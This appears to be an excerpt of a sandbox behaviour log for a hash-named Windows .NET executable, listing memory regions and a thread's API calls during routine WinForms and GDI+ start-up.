entry_point = 0x0
region_type = private
name = "private_0x000000000a310000"
filename = ""
Region:
id = 1632
start_va = 0xa6d0000
end_va = 0xa7cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a6d0000"
filename = ""
Region:
id = 1633
start_va = 0x7ef9e000
end_va = 0x7efa0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef9e000"
filename = ""
Region:
id = 1634
start_va = 0x4df0000
end_va = 0x4dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004df0000"
filename = ""
Region:
id = 1635
start_va = 0x4e00000
end_va = 0x4e0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e00000"
filename = ""
Region:
id = 1636
start_va = 0x4e10000
end_va = 0x4e1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e10000"
filename = ""
Region:
id = 1637
start_va = 0x4e20000
end_va = 0x4e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e20000"
filename = ""
Region:
id = 1638
start_va = 0x4fd0000
end_va = 0x4fdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004fd0000"
filename = ""
Region:
id = 1639
start_va = 0x4ff0000
end_va = 0x4ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ff0000"
filename = ""
Region:
id = 1640
start_va = 0x5000000
end_va = 0x500ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005000000"
filename = ""
Region:
id = 1641
start_va = 0x5010000
end_va = 0x501ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005010000"
filename = ""
Region:
id = 1642
start_va = 0x5020000
end_va = 0x502ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005020000"
filename = ""
Region:
id = 1643
start_va = 0x5030000
end_va = 0x503ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005030000"
filename = ""
Region:
id = 1644
start_va = 0x5040000
end_va = 0x504ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005040000"
filename = ""
Region:
id = 1645
start_va = 0x5090000
end_va = 0x509ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005090000"
filename = ""
Region:
id = 1646
start_va = 0x50a0000
end_va = 0x50affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000050a0000"
filename = ""
Region:
id = 1647
start_va = 0x5a20000
end_va = 0x5a2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005a20000"
filename = ""
Region:
id = 1648
start_va = 0x5a30000
end_va = 0x5a3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005a30000"
filename = ""
Region:
id = 1649
start_va = 0x5a40000
end_va = 0x5a4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005a40000"
filename = ""
Region:
id = 1655
start_va = 0x4df0000
end_va = 0x4e26fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004df0000"
filename = ""
Region:
id = 1656
start_va = 0x1360000
end_va = 0x136ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001360000"
filename = ""
Region:
id = 1657
start_va = 0x1360000
end_va = 0x136ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001360000"
filename = ""
Region:
id = 1658
start_va = 0x4fd0000
end_va = 0x4fdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004fd0000"
filename = ""
Region:
id = 1659
start_va = 0x4ff0000
end_va = 0x4ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ff0000"
filename = ""
Region:
id = 1660
start_va = 0x5000000
end_va = 0x500ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005000000"
filename = ""
Region:
id = 1709
start_va = 0xa400000
end_va = 0xa43ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a400000"
filename = ""
Region:
id = 1710
start_va = 0xa940000
end_va = 0xaa3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a940000"
filename = ""
Region:
id = 1711
start_va = 0x7ef9b000
end_va = 0x7ef9dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef9b000"
filename = ""
Thread:
id = 1
os_tid = 0xf64
[0061.746] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0064.767] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x17e4a0 | out: phkResult=0x17e4a0*=0x0) returned 0x2
[0064.767] RegCloseKey (hKey=0x80000002) returned 0x0
[0064.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x17e724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77
[0064.814] IsAppThemed () returned 0x1
[0064.823] CoTaskMemAlloc (cb=0xf0) returned 0x6775d0
[0064.824] CreateActCtxA (pActCtx=0x17ec48) returned 0x680ec4
[0064.945] CoTaskMemFree (pv=0x6775d0)
[0064.970] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1cf
[0064.971] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1ce
[0065.486] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config", nBufferLength=0x105, lpBuffer=0x17e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config", lpFilePart=0x0) returned 0x66
[0065.771] GetCurrentProcess () returned 0xffffffff
[0065.772] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x17e8d8 | out: TokenHandle=0x17e8d8*=0x1f0) returned 1
[0065.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x17e390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e
[0065.966] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x17e8d0 | out: lpFileInformation=0x17e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0065.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x17e35c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0065.968] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x17e8d8 | out: lpFileInformation=0x17e8d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0065.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x17e2f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0065.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x17e810) returned 1
[0065.972] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x40
[0065.973] GetFileType (hFile=0x40) returned 0x1
[0065.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x17e80c) returned 1
[0065.973] GetFileType (hFile=0x40) returned 0x1
[0069.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x17db48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43
[0069.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x17dbac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43
[0069.454] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x17ddec) returned 1
[0069.454] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x17e0b0 | out: lpFileInformation=0x17e0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0069.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x17dde8) returned 1
[0069.713] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x17df7c | out: pfEnabled=0x17df7c) returned 0x0
[0070.390] GetFileSize (in: hFile=0x40, lpFileSizeHigh=0x17e8cc | out: lpFileSizeHigh=0x17e8cc*=0x0) returned 0x8c8e
[0070.391] ReadFile (in: hFile=0x40, lpBuffer=0x28702b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17e888, lpOverlapped=0x0 | out: lpBuffer=0x28702b8*, lpNumberOfBytesRead=0x17e888*=0x1000, lpOverlapped=0x0) returned 1
[0070.744] ReadFile (in: hFile=0x40, lpBuffer=0x28702b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17e738, lpOverlapped=0x0 | out: lpBuffer=0x28702b8*, lpNumberOfBytesRead=0x17e738*=0x1000, lpOverlapped=0x0) returned 1
[0070.746] ReadFile (in: hFile=0x40, lpBuffer=0x28702b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17e5ec, lpOverlapped=0x0 | out: lpBuffer=0x28702b8*, lpNumberOfBytesRead=0x17e5ec*=0x1000, lpOverlapped=0x0) returned 1
[0070.747] ReadFile (in: hFile=0x40, lpBuffer=0x28702b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17e5ec, lpOverlapped=0x0 | out: lpBuffer=0x28702b8*, lpNumberOfBytesRead=0x17e5ec*=0x1000, lpOverlapped=0x0) returned 1
[0070.748] ReadFile (in: hFile=0x40, lpBuffer=0x28702b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17e5ec, lpOverlapped=0x0 | out: lpBuffer=0x28702b8*, lpNumberOfBytesRead=0x17e5ec*=0x1000, lpOverlapped=0x0) returned 1
[0070.749] ReadFile (in: hFile=0x40, lpBuffer=0x28702b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17e524, lpOverlapped=0x0 | out: lpBuffer=0x28702b8*, lpNumberOfBytesRead=0x17e524*=0x1000, lpOverlapped=0x0) returned 1
[0070.758] ReadFile (in: hFile=0x40, lpBuffer=0x28702b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17e690, lpOverlapped=0x0 | out: lpBuffer=0x28702b8*, lpNumberOfBytesRead=0x17e690*=0x1000, lpOverlapped=0x0) returned 1
[0070.760] ReadFile (in: hFile=0x40, lpBuffer=0x28702b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17e584, lpOverlapped=0x0 | out: lpBuffer=0x28702b8*, lpNumberOfBytesRead=0x17e584*=0x1000, lpOverlapped=0x0) returned 1
[0070.760] ReadFile (in: hFile=0x40, lpBuffer=0x28702b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17e584, lpOverlapped=0x0 | out: lpBuffer=0x28702b8*, lpNumberOfBytesRead=0x17e584*=0xc8e, lpOverlapped=0x0) returned 1
[0070.760] ReadFile (in: hFile=0x40, lpBuffer=0x28702b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17e648, lpOverlapped=0x0 | out: lpBuffer=0x28702b8*, lpNumberOfBytesRead=0x17e648*=0x0, lpOverlapped=0x0) returned 1
[0070.760] CloseHandle (hObject=0x40) returned 1
[0070.761] CloseHandle (hObject=0x1f0) returned 1
[0070.763] GetCurrentProcess () returned 0xffffffff
[0070.763] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x17ea24 | out: TokenHandle=0x17ea24*=0x1f0) returned 1
[0070.764] CloseHandle (hObject=0x1f0) returned 1
[0070.764] GetCurrentProcess () returned 0xffffffff
[0070.764] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x17ea24 | out: TokenHandle=0x17ea24*=0x1f0) returned 1
[0070.765] CloseHandle (hObject=0x1f0) returned 1
[0070.774] GetCurrentProcess () returned 0xffffffff
[0070.774] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x17e8d8 | out: TokenHandle=0x17e8d8*=0x1f0) returned 1
[0070.775] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x17e8d0 | out: lpFileInformation=0x17e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0070.776] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config", nBufferLength=0x105, lpBuffer=0x17e35c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config", lpFilePart=0x0) returned 0x66
[0070.776] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x17e8d8 | out: lpFileInformation=0x17e8d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0070.777] CloseHandle (hObject=0x1f0) returned 1
[0070.777] GetCurrentProcess () returned 0xffffffff
[0070.777] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x17ea24 | out: TokenHandle=0x17ea24*=0x1f0) returned 1
[0070.778] CloseHandle (hObject=0x1f0) returned 1
[0070.779] GetCurrentProcess () returned 0xffffffff
[0070.780] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x17ea24 | out: TokenHandle=0x17ea24*=0x1f0) returned 1
[0070.780] CloseHandle (hObject=0x1f0) returned 1
[0070.826] GetCurrentProcess () returned 0xffffffff
[0070.826] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x17e83c | out: TokenHandle=0x17e83c*=0x1f0) returned 1
[0070.835] CloseHandle (hObject=0x1f0) returned 1
[0070.836] GetCurrentProcess () returned 0xffffffff
[0070.836] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x17e854 | out: TokenHandle=0x17e854*=0x1f0) returned 1
[0070.844] CloseHandle (hObject=0x1f0) returned 1
[0070.853] GetSystemMetrics (nIndex=75) returned 1
[0070.861] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0
[0071.960] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x752b0000
[0071.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AddDllDirectory", cchWideChar=15, lpMultiByteStr=0x17eb20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AddDllDirectory", lpUsedDefaultChar=0x0) returned 15
[0071.964] GetProcAddress (hModule=0x752b0000, lpProcName="AddDllDirectory") returned 0x753d1e91
[0071.965] LoadLibraryExW (lpLibFileName="comctl32.dll", hFile=0x0, dwFlags=0x800) returned 0x6d7a0000
[0072.060] AdjustWindowRectEx (in: lpRect=0x17ec88, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x17ec88) returned 1
[0072.069] GetCurrentProcess () returned 0xffffffff
[0072.069] GetCurrentThread () returned 0xfffffffe
[0072.069] GetCurrentProcess () returned 0xffffffff
[0072.069] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x17eba0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x17eba0*=0x40) returned 1
[0072.072] GetCurrentThreadId () returned 0xf64
[0072.084] GetCurrentActCtx (in: lphActCtx=0x17eb00 | out: lphActCtx=0x17eb00*=0x0) returned 1
[0072.084] ActivateActCtx (in: hActCtx=0x680ec4, lpCookie=0x17eb10 | out: hActCtx=0x680ec4, lpCookie=0x17eb10) returned 1
[0072.087] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76860000
[0072.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x17e9b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcW°nHè·\x90Dþwq î\x17", lpUsedDefaultChar=0x0) returned 14
[0072.088] GetProcAddress (hModule=0x76860000, lpProcName="DefWindowProcW") returned 0x76f325dd
[0072.088] GetStockObject (i=5) returned 0x1900015
[0072.092] GetModuleHandleW (lpModuleName=0x0) returned 0x1370000
[0072.098] CoTaskMemAlloc (cb=0x5c) returned 0x68b888
[0072.098] RegisterClassW (lpWndClass=0x17e9a8) returned 0xc12d
[0072.099] CoTaskMemFree (pv=0x68b888)
[0072.099] GetModuleHandleW (lpModuleName=0x0) returned 0x1370000
[0072.100] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x1370000, lpParam=0x0) returned 0x70044
[0072.102] SetWindowLongW (hWnd=0x70044, nIndex=-4, dwNewLong=1995646429) returned 18680022
[0072.103] GetWindowLongW (hWnd=0x70044, nIndex=-4) returned 1995646429
[0072.109] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x17e2bc | out: phkResult=0x17e2bc*=0x230) returned 0x0
[0072.114] RegQueryValueExW (in: hKey=0x230, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x17e2dc, lpData=0x0, lpcbData=0x17e2d8*=0x0 | out: lpType=0x17e2dc*=0x0, lpData=0x0, lpcbData=0x17e2d8*=0x0) returned 0x2
[0072.114] RegQueryValueExW (in: hKey=0x230, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x17e2dc, lpData=0x0, lpcbData=0x17e2d8*=0x0 | out: lpType=0x17e2dc*=0x0, lpData=0x0, lpcbData=0x17e2d8*=0x0) returned 0x2
[0072.115] RegCloseKey (hKey=0x230) returned 0x0
[0072.119] SetWindowLongW (hWnd=0x70044, nIndex=-4, dwNewLong=18680062) returned 1995646429
[0072.119] GetWindowLongW (hWnd=0x70044, nIndex=-4) returned 18680062
[0072.119] GetWindowLongW (hWnd=0x70044, nIndex=-16) returned 113311744
[0072.120] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc073
[0072.121] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x70044, Msg=0x24, wParam=0x0, lParam=0x17e594) returned 0x0
[0072.121] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc076
[0072.121] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x70044, Msg=0x81, wParam=0x0, lParam=0x17e588) returned 0x1
[0072.122] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x70044, Msg=0x83, wParam=0x0, lParam=0x17e574) returned 0x0
[0072.122] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x70044, Msg=0x1, wParam=0x0, lParam=0x17e588) returned 0x0
[0072.122] GetClientRect (in: hWnd=0x70044, lpRect=0x17e2f0 | out: lpRect=0x17e2f0) returned 1
[0072.122] GetWindowRect (in: hWnd=0x70044, lpRect=0x17e2f0 | out: lpRect=0x17e2f0) returned 1
[0072.124] GetParent (hWnd=0x70044) returned 0x0
[0072.124] DeactivateActCtx (dwFlags=0x0, ulCookie=0x13470001) returned 1
[0072.759] AdjustWindowRectEx (in: lpRect=0x17ea38, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x17ea38) returned 1
[0072.765] AdjustWindowRectEx (in: lpRect=0x17ea48, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17ea48) returned 1
[0072.766] AdjustWindowRectEx (in: lpRect=0x17ea48, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17ea48) returned 1
[0072.767] AdjustWindowRectEx (in: lpRect=0x17ea48, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17ea48) returned 1
[0072.768] AdjustWindowRectEx (in: lpRect=0x17ea48, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17ea48) returned 1
[0072.769] AdjustWindowRectEx (in: lpRect=0x17ea48, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17ea48) returned 1
[0072.769] AdjustWindowRectEx (in: lpRect=0x17ea38, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x17ea38) returned 1
[0072.773] AdjustWindowRectEx (in: lpRect=0x17ea4c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17ea4c) returned 1
[0072.774] AdjustWindowRectEx (in: lpRect=0x17ea4c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x17ea4c) returned 1
[0072.775] AdjustWindowRectEx (in: lpRect=0x17ea38, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x17ea38) returned 1
[0072.782] GetCurrentThreadId () returned 0xf64
[0072.782] GetCurrentThreadId () returned 0xf64
[0072.790] GetSystemDefaultLCID () returned 0x409
[0072.790] GetStockObject (i=17) returned 0x18a0025
[0072.792] GetObjectW (in: h=0x18a0025, c=92, pv=0x17e89c | out: pv=0x17e89c) returned 92
[0072.794] GetDC (hWnd=0x0) returned 0x4f010681
[0073.601] GdiplusStartup (in: token=0x1b6018, input=0x17de60, output=0x17deb0 | out: token=0x1b6018, output=0x17deb0) returned 0x0
[0073.638] CoTaskMemAlloc (cb=0x5c) returned 0x68b888
[0073.651] GdipCreateFontFromLogfontW (hdc=0x4f010681, logfont=0x68b888, font=0x17e964) returned 0x0
[0088.905] CoTaskMemFree (pv=0x68b888)
[0088.907] CoTaskMemAlloc (cb=0x5c) returned 0x68b888
[0088.908] CoTaskMemFree (pv=0x68b888)
[0088.908] CoTaskMemAlloc (cb=0x5c) returned 0x68b888
[0088.909] CoTaskMemFree (pv=0x68b888)
[0088.910] GdipGetFontUnit (font=0x4fc2230, unit=0x17e92c) returned 0x0
[0088.910] GdipGetFontSize (font=0x4fc2230, size=0x17e930) returned 0x0
[0088.910] GdipGetFontStyle (font=0x4fc2230, style=0x17e928) returned 0x0
[0088.911] GdipGetFamily (font=0x4fc2230, family=0x17e924) returned 0x0
[0088.913] GdipGetFontSize (font=0x4fc2230, size=0x288e04c) returned 0x0
[0088.914] ReleaseDC (hWnd=0x0, hDC=0x4f010681) returned 1
[0088.915] GetDC (hWnd=0x0) returned 0x4f010681
[0088.917] GdipCreateFromHDC (hdc=0x4f010681, graphics=0x17e940) returned 0x0
[0088.919] GdipGetDpiY (graphics=0x7414d48, dpi=0x288e128) returned 0x0
[0088.920] GdipGetFontHeight (font=0x4fc2230, graphics=0x7414d48, height=0x17e938) returned 0x0
[0088.920] GdipGetEmHeight (family=0x657f6b0, style=0, EmHeight=0x17e940) returned 0x0
[0088.921] GdipGetLineSpacing (family=0x657f6b0, style=0, LineSpacing=0x17e940) returned 0x0
[0088.921] GdipDeleteGraphics (graphics=0x7414d48) returned 0x0
[0088.921] ReleaseDC (hWnd=0x0, hDC=0x4f010681) returned 1
[0088.923] GdipCreateFont (fontFamily=0x657f6b0, emSize=0x41040000, style=0, unit=0x3, font=0x288e144) returned 0x0
[0088.923] GdipGetFontSize (font=0x74e0e68, size=0x288e148) returned 0x0
[0088.923] GdipDeleteFont (font=0x4fc2230) returned 0x0
[0088.930] GetCurrentThreadId () returned 0xf64
[0088.930] GetCurrentThreadId () returned 0xf64
[0088.931] GetCurrentThreadId () returned 0xf64
[0088.931] GetCurrentThreadId () returned 0xf64
[0088.931] GetCurrentThreadId () returned 0xf64
[0088.931] GetCurrentThreadId () returned 0xf64
[0088.931] GetCurrentThreadId () returned 0xf64
[0088.931] GetCurrentThreadId () returned 0xf64
[0088.932] AdjustWindowRectEx (in: lpRect=0x17e9d8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x17e9d8) returned 1
[0088.941] GetProcessWindowStation () returned 0x60
[0088.946] GetUserObjectInformationA (in: hObj=0x60, nIndex=1, pvInfo=0x288e9f0, nLength=0xc, lpnLengthNeeded=0x17e8b4 | out: pvInfo=0x288e9f0, lpnLengthNeeded=0x17e8b4) returned 1
[0088.950] SetConsoleCtrlHandler (HandlerRoutine=0x11d0926, Add=1) returned 1
[0088.951] GetModuleHandleW (lpModuleName=0x0) returned 0x1370000
[0088.951] GetModuleHandleW (lpModuleName=0x0) returned 0x1370000
[0088.954] GetClassInfoW (in: hInstance=0x1370000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWndClass=0x288ea54 | out: lpWndClass=0x288ea54) returned 0
[0088.957] CoTaskMemAlloc (cb=0x58) returned 0x6611f0
[0088.957] RegisterClassW (lpWndClass=0x17e804) returned 0xc1d1
[0088.957] CoTaskMemFree (pv=0x6611f0)
